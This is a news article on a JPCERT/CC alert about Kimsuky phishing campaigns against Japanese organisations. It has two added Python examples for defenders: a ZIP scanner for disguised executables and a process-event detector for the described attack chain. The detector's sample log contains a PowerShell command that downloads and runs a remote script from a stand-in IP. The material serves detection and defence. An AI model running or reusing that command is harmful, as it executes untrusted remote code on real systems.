Japan warns of Kimsuky cyber campaigns targeting Japanese orgs

July 12, 2024

Japan's national computer emergency response team, JPCERT/CC, has issued an alert about the North Korean advanced persistent threat group Kimsuky targeting Japanese organisations.

The US government has identified Kimsuky as a North Korean advanced persistent threat (APT) group that conducts attacks on targets worldwide to acquire intelligence, especially in the military and defence sector, for the benefit and interest of the Democratic People’s Republic of Korea (DPRK).

These threat actors are notorious for utilising social engineering and phishing to acquire initial access to targeted networks. Subsequently, they use well-known malware to steal data and establish persistence on compromised networks.

According to the alert, the group's attacks were detected earlier this year, with attribution based on indicators of compromise (IoCs) published by various researchers. JPCERT/CC has determined that the attack group known as Kimsuky targeted Japanese organisations in March 2024.

The North Korean state-sponsored threat group Kimsuky commonly initiates its attacks using phishing tactics.

The Kimsuky APT group begins its attacks by sending phishing emails to targets in Japan, impersonating security and diplomatic entities, and utilises a malicious ZIP attachment.

The ZIP file contains an executable that infects the system with malware, plus two decoy document files. The executable's filename is padded with a long run of spaces between a document-like name and the appended [.]exe extension, so the real extension is pushed out of view and the file appears to be a document.
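The padding trick is easy to catch before the attachment reaches a user. The following is an added example (not code from JPCERT/CC or from this article) that inspects a ZIP in memory and flags entries whose names or contents look like disguised executables. It goes slightly beyond the specific case above: besides whitespace padding it also checks for double extensions and for a PE header ("MZ") hiding under a document extension. The sample archive, the extension lists and the thresholds are constructed assumptions.

```python
import io
import re
import zipfile

# Assumed lists: extensions Windows executes directly, and common document types.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse", "hta", "lnk"}
DOC_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "hwp"}

# A document-looking name, a long run of whitespace, then the real extension.
# Five spaces is an assumed threshold; real lures use far more.
PADDED_RE = re.compile(r"\s{5,}\.([A-Za-z0-9]+)$")


def classify_entry(name, head):
    """Return the reasons an archive entry looks like a disguised executable.

    name: the entry's filename inside the ZIP; head: its first two bytes.
    """
    reasons = []
    base = name.rsplit("/", 1)[-1]
    m = PADDED_RE.search(base)
    if m and m.group(1).lower() in EXEC_EXTS:
        reasons.append("whitespace-padded executable extension")
    parts = base.strip().lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if len(parts) >= 3 and ext in EXEC_EXTS and parts[-2].strip() in DOC_EXTS:
        reasons.append("double extension (document name, executable suffix)")
    # Content/extension mismatch: a PE image under a document extension.
    if head == b"MZ" and ext in DOC_EXTS:
        reasons.append("PE header under a document extension")
    return reasons


def scan_zip(zip_bytes):
    """Map each flagged entry name to its reasons. Nothing is extracted to disk."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed
            reasons = classify_entry(info.filename, head)
            if reasons:
                flagged[info.filename] = reasons
    return flagged


def build_sample_zip():
    """Constructed sample mirroring the described attachment: one padded EXE
    plus two decoy documents. Contents are dummy bytes, not real malware."""
    padded_name = "Security Briefing.docx" + " " * 60 + ".exe"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(padded_name, b"MZ\x90\x00" + b"\x00" * 60)   # fake PE stub
        zf.writestr("decoy1.docx", b"PK\x03\x04" + b"\x00" * 16)  # docx is itself a ZIP
        zf.writestr("decoy2.pdf", b"%PDF-1.4\n%fake")
        zf.writestr("agenda.docx", b"MZ\x90\x00" + b"\x00" * 16)  # PE disguised as docx
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample_zip()).items():
        print(repr(name), "->", "; ".join(reasons))
```

Reading only the first two bytes of each entry keeps the scan cheap and avoids inflating an attacker-controlled archive; the name checks alone already catch the lure described in the article.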

Once a victim runs the executable from the ZIP file, it downloads and executes a VBS file and configures 'C:\Users\Public\Pictures\desktop.ini.bak' to be run automatically by Wscript.

Subsequently, the VBS file downloads a PowerShell script that harvests data such as process lists, network details, file lists from directories, and user account information. The attackers then transfer this information to a remote URL.

This information also allows Kimsuky to determine whether the infected device belongs to a real user or is an analysis environment such as a sandbox. Finally, a new VBS file is created and executed, which downloads a PowerShell script that captures keystrokes and clipboard data and sends them to the attackers.
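The chain above (executable, then Wscript running a file with a non-script extension from a world-writable directory, then PowerShell spawned by the script host) is visible in ordinary process-creation telemetry. The following is an added example, not part of the article or of JPCERT/CC's report, that runs three simple rules over constructed Sysmon-style process events. The log format, the command lines, the IP address (from the documentation range) and the rule thresholds are all assumptions made for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str   # ParentImage
    image: str    # Image
    cmdline: str  # CommandLine


# Constructed sample telemetry, one event per line: ts|ParentImage|Image|CommandLine.
# Not real captured data; the chain mirrors the behaviour described in the article.
SAMPLE_LOG = """\
2024-03-12T09:14:02|C:\\Windows\\explorer.exe|C:\\Users\\alice\\Downloads\\Security Briefing.docx                              .exe|"C:\\Users\\alice\\Downloads\\Security Briefing.docx                              .exe"
2024-03-12T09:14:03|C:\\Users\\alice\\Downloads\\Security Briefing.docx                              .exe|C:\\Windows\\System32\\wscript.exe|wscript.exe //B //E:vbscript C:\\Users\\Public\\Pictures\\desktop.ini.bak
2024-03-12T09:14:05|C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/p')"
2024-03-12T09:20:11|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Scripts\\logon.vbs
2024-03-12T09:21:00|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Admin\\backup.ps1
"""

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
PUBLIC_DIR_RE = re.compile(r"c:\\users\\public\\", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # quoted or bare command-line token


def tokens(cmdline):
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def script_target(cmdline):
    """For a wscript/cscript command line, return the script file it was asked to run
    (first argument that is not a /switch)."""
    for tok in tokens(cmdline)[1:]:
        if not tok.startswith("/"):
            return tok
    return None


def detect(event):
    """Return the names of the rules this event fires."""
    hits = []
    img = basename(event.image)
    parent = basename(event.parent)
    if img in SCRIPT_HOSTS:
        target = script_target(event.cmdline)
        if target:
            if not target.lower().endswith(SCRIPT_EXTS):
                hits.append("script host running a non-script extension")
            if PUBLIC_DIR_RE.search(target):
                hits.append("script executed from C:\\Users\\Public")
    if img == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("PowerShell spawned by a script host")
    return hits


def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, parent, image, cmdline = line.split("|", 3)
            events.append(ProcEvent(ts, parent, image, cmdline))
    return events


def scan(text):
    """Return [(timestamp, image basename, [rule names])] for events that fired a rule."""
    return [(ev.ts, basename(ev.image), detect(ev))
            for ev in parse_log(text) if detect(ev)]


if __name__ == "__main__":
    for ts, image, hits in scan(SAMPLE_LOG):
        print(ts, image, "->", "; ".join(hits))
```

The benign events (a logon script under C:\Scripts and an admin PowerShell launched from Explorer) fire nothing, while the desktop.ini.bak launch fires two rules and the PowerShell child of wscript.exe fires the third; correlating those within a few seconds of a user-launched executable is the signal worth alerting on.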

The keylogger’s information could contain credentials, allowing threat actors to penetrate the organisation’s systems and applications further.

Japanese organisations should be aware of this recent campaign by the North Korean APT group. Users, especially employees from the targeted sector, should be wary of suspicious messages as the Kimsuky operators widely use phishing tactics to start malicious campaigns.
